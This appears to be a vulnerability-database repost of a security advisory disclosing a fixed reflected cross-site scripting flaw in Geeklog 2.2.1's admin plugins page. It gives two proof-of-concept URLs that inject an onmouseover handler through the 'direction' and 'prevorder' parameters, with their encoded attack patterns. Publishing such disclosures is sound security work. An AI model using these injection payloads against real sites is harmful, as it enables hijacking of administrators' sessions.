Vulners
Lucene search
Geeklog 2.2.1 Cross Site Scripting
🗓️ 27 Apr 2020 00:00:00Reported by Daniel BishtawiType 
packetstorm🔗 packetstormsecurity.com👁 110 Views
`Information
--------------------
Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-001
Technical Details
--------------------
URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x
"%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load
Parameter Name : direction
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22
URL :
http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x
"%20onmouseover=netsparker(0x019E05)%20x="
Parameter Name : prevorder
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22
For more information:
https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2020 00:00Current
7.4High risk
Vulners AI Score7.4